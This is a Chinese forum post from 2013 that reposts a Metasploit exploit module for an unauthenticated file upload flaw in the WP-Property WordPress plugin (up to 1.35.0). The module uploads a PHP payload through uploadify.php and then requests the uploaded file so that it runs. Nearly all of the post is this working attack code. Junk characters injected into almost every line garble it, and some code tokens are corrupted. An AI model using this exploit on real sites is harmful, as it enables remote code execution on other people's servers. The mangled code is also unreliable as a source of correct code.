WordPress WP-Property PHP 文件上传漏洞6 ^; Z" _: f) b! C Q) u, A
4 T( t! z+ ~( B, @
## # This file is part of the Metasploit Framework and may be subject to; H4 ~& ]( s( \. S5 Q
: M* L9 T# \$ K# |1 R" \% L8 ^- ~# redistribution and commercial restrictions. Please see the Metasploit# q" Q( o( y9 h" K
2 j$ [& `. m6 W" }' K' c# Framework web site for more information on licensing and terms of use.: n, k5 d# t. P% W4 c
1 G; s% \/ L& C. t
# http://metasploit.com/framework/ ##
. Z) S6 ^9 A& l+ F' r; }- W0 P) |% }* p+ `# B
0 K6 {: B: @" W4 Y- E) b% q! K
4 W3 ^; G5 E% _) F: Q9 X / @7 r3 X1 I3 ? x* e8 C) @
' S- }6 E: [/ T+ ~9 Erequire 'msf/core') t& Q) i3 X3 _- o/ |
require 'msf/core/exploit/php_exe'
+ \$ D" U: }4 M& o# g( v$ k
- [& V {' ?( o' B; T# ~( j/ Rclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',/ t3 ?/ s5 M3 q- D* @+ m
'Description' => %q{5 T7 _% s* P" f% _: ~
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>+ [6 e4 S# c* H/ j; k6 Q8 r
[
4 y& K2 ^4 \4 E% {3 s'Sammy FORGIT', # initial discovery* P# [, m! S6 N) y8 ^
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
4 g# `# O. u, C/ K% J+ F( F4 c],6 s9 a2 U1 a+ {/ _) V
'License' => MSF_LICENSE,1 h: C) F1 |& {3 |+ N3 `
'References' =>
! q6 e* ?, }0 w7 m# G6 u[5 i( D% ?; m2 h2 }% Q% O6 F
[ 'OSVDB', '82656' ],
! {: k7 h n- M. E2 V[ 'BID', '53787' ],
# T7 f1 y/ U C, ][ 'EDB', '18987'],0 j0 ^% h" k$ K
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]+ T3 M% B( c4 N
],+ i! Y2 \! B% j" _' N1 h1 V: H- Z1 u
'Payload' =>
: l5 Q3 K! T; X; [- U4 c{- }' x& r! b# ]' o
'BadChars' => "\x00",
4 T6 e" C1 {2 b! W},, [8 R8 b o& g7 C: [
'Platform' => 'php',
( a! ?' c! u0 \6 b) f'Arch' => ARCH_PHP,
; Z4 c4 {7 H- K- j'Targets' =>
) x2 h4 t, l. M9 T9 G1 N[6 A- j, J- w$ ?% A5 ]/ \
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],) D1 w. b" P2 q3 _, A) c6 r
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
; F: g. l* Z* C" u" f],: a, C3 o9 i7 F. l& ?! m
'DefaultTarget' => 0,
3 K" o( r, l3 D! h. J. M! `# m5 {'DisclosureDate' => 'Mar 26 2012'))( K, Q% O6 O W, Z
2 r6 j& d" S$ g% d Z# |3 y& M
register_options(
8 K' O. y3 [9 G[
& }# ?2 T" T1 tOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. o2 g0 C, @% ^7 {; u! ~+ r], self.class)
8 @+ F0 C! l/ C# Q) z; Fend
# b2 {2 A; j' c4 A4 E( Z
3 [1 z/ D0 O' A% u! `! ?def check
" }$ ~. N4 V# f1 Luri = target_uri.path. ~; Y1 p8 a0 L* x; t: _
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) d3 t9 n( K! C! T3 k6 n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
6 J' T$ \3 T8 L _! U3 j% U}): `' H% |! a5 h4 i* X
. e1 [2 }+ k9 O. m5 C; N
if not res or res.code != 2005 q: G: P, w. z# Q. y% K
return Exploit::CheckCode::Unknown- z7 `. s$ w: a
end2 ~8 x: @7 M+ z( v3 L9 y
3 W' Q4 ]8 @; t2 K: P mreturn Exploit::CheckCode::Appears; r. I, a) E ^( B8 }
end6 i! V3 n& N o' C, w* {' S
6 e7 h/ b; G% y0 F
def exploit
3 q4 t$ p3 i8 B5 E2 H0 Vuri = target_uri.path K1 P1 S. {; @2 J m( H: ~
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
/ P7 o( l/ D, N U2 O$ h, R2 S. `9 U' \
data = Rex::MIME::Message.new* y. a& p* E+ @/ P4 B
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")9 A' R b% `. K! O( \
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
+ r7 X5 _% E, z- `. z5 ?post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 [' N" b C$ P3 a+ B6 H$ f* q: p* G7 z/ o
print_status("#{peer} - Uploading payload #{@payload_name}")" k) M0 ?9 V) \# B' e. G" Q
res = send_request_cgi({1 N0 o; `, w0 p6 }+ J1 E
'method' => 'POST',
6 U! I' U$ R) ]9 |" S( U'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",# h7 E g$ Q: W
'ctype' => "multipart/form-data; boundary=#{data.bound}",6 ~, |4 b1 ~# G
'data' => post_data
" S5 z% D2 |6 p})* I& \$ t7 v$ _: w1 q
! F' ~+ E% n% F
if not res or res.code != 200 or res.body !~ /#{@payload_name}/8 I. f6 \3 S; ]3 V$ G2 Z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")" m" g% `) P) w1 W+ R6 }& g
end
! I e% S: F+ o' m3 q z1 H. T3 s/ U+ K8 U: d |, S
upload_uri = res.body
8 n; z; u! M! I) H2 x" x
9 c% _- p' W5 s2 l2 b7 N/ P5 kprint_status("#{peer} - Executing payload #{@payload_name}")
! z/ d' T* s& {! eres = send_request_raw({
2 t% O& N! l' _; C'uri' => upload_uri,! j' y7 G1 X. ?. ^5 t! l) n/ O
'method' => 'GET'& }, w" w3 ]9 u$ ?# Q
})0 }) G$ u! Z& X. t0 w
end
/ P4 |. g" b# g2 {" `2 j0 Nend8 u7 Q* b3 a6 l( Q0 B
: }; r8 C! | K; R+ d7 t' c不要问我这写的是什么 怎么利用 我是说msf.
) R3 _8 o1 U9 e5 L: U+ E8 K' z$ W: ], ~: f
/ _$ x W0 N. D& T( D |
发表于 2013-1-4 19:51:30
收藏
支持
反对